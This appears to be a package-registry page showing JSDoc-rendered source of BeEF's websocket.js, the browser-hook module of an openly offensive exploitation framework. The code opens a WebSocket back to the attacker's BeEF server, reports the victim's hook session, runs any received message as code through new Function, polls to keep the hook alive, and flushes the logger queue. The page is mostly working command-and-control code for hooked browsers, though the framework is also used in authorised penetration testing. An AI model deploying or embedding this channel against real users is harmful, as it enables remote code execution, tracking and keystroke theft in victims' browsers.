UNPKG

beef-npm

Version:

Node.js package to install and interact with BeEF (Browser Exploitation Framework)

152 lines (117 loc) 6.05 kB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>JSDoc: Source: websocket.js</title> <script src="scripts/prettify/prettify.js"> </script> <script src="scripts/prettify/lang-css.js"> </script> <!--[if lt IE 9]> <script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> <link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css"> <link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css"> </head> <body> <div id="main"> <h1 class="page-title">Source: websocket.js</h1> <section> <article> <pre class="prettyprint source linenums"><code>// // Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net // Browser Exploitation Framework (BeEF) - https://beefproject.com // See the file 'doc/COPYING' for copying permission // /** * Manage the WebSocket communication channel. * This channel is much faster and responsive, and it's used automatically * if the browser supports WebSockets AND beef.http.websocket.enable = true. * @namespace beef.websocket */ beef.websocket = { socket:null, ws_poll_timeout: "&lt;%= @ws_poll_timeout %>", ws_connect_timeout: "&lt;%= @ws_connect_timeout %>", /** * Initialize the WebSocket client object. * Note: use WebSocketSecure only if the hooked origin is under https. * Mixed-content in WS is quite different from a non-WS context. */ init:function () { var webSocketServer = beef.net.host; var webSocketPort = "&lt;%= @websocket_port %>"; var webSocketSecure = "&lt;%= @websocket_secure %>"; var protocol = "ws://"; if(webSocketSecure &amp;&amp; window.location.protocol=="https:"){ protocol = "wss://"; webSocketPort= "&lt;%= @websocket_sec_port %>"; } if (beef.browser.isFF() &amp;&amp; !!window.MozWebSocket) { beef.websocket.socket = new MozWebSocket(protocol + webSocketServer + ":" + webSocketPort + "/"); }else{ beef.websocket.socket = new WebSocket(protocol + webSocketServer + ":" + webSocketPort + "/"); } }, /** * Send Hello message to the BeEF server and start async polling. */ start:function () { new beef.websocket.init(); this.socket.onopen = function () { beef.websocket.send('{"cookie":"' + beef.session.get_hook_session_id() + '"}'); beef.websocket.alive(); }; this.socket.onmessage = function (message) { // Data coming from the WebSocket channel is either of String, Blob or ArrayBufferdata type. // That's why it needs to be evaluated first. Using Function is a bit better than pure eval(). // It's not a big deal anyway, because the eval'ed data comes from BeEF itself, so it is implicitly trusted. new Function(message.data)(); }; this.socket.onclose = function () { setTimeout(function(){beef.websocket.start()}, 5000); }; }, /** * Send data back to BeEF. This is basically the same as beef.net.send, * but doesn't queue commands. * Example usage: * beef.websocket.send('{"handler" : "' + handler + '", "cid" :"' + cid + * '", "result":"' + beef.encode.base64.encode(beef.encode.json.stringify(results)) + * '","callback": "' + callback + '","bh":"' + beef.session.get_hook_session_id() + '" }'); */ send:function (data) { try { this.socket.send(data); }catch(err){} }, /** * Polling mechanism, to notify the BeEF server that the browser is still hooked, * and the WebSocket channel still alive. * todo: there is probably a more efficient way to do this. Double-check WebSocket API. */ alive: function (){ try { if (beef.logger.running) { beef.logger.queue(); } } catch(err){} beef.net.flush(); beef.websocket.send('{"alive":"'+beef.session.get_hook_session_id()+'"}'); setTimeout("beef.websocket.alive()", parseInt(beef.websocket.ws_poll_timeout)); } }; beef.regCmp('beef.websocket'); </code></pre> </article> </section> </div> <nav> <h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="BeefJS.html">BeefJS</a></li><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li></ul><h3>Global</h3><ul><li><a href="global.html#platform">platform</a></li></ul> </nav> <br class="clear"> <footer> Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 4.0.4</a> on Wed Oct 23 2024 16:03:46 GMT+1000 (Australian Eastern Standard Time) </footer> <script> prettyPrint(); </script> <script src="scripts/linenumber.js"> </script> </body> </html>